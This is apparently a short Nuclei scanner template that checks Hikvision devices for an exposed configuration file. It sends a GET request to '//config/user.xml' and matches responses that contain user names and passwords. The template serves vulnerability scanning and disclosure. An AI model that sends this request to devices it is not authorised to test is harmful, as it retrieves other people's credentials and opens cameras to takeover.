id: hikvision-info-leak

info:
  name: Hikvision Info Leak
  author: pikpikcu
  severity: medium
  tags: exposure,config

requests:
  - method: GET
    path:
      - '{{BaseURL}}//config/user.xml'

    matchers:
      - type: word
        words:
          - '<user name='
          - 'password='
        condition: and
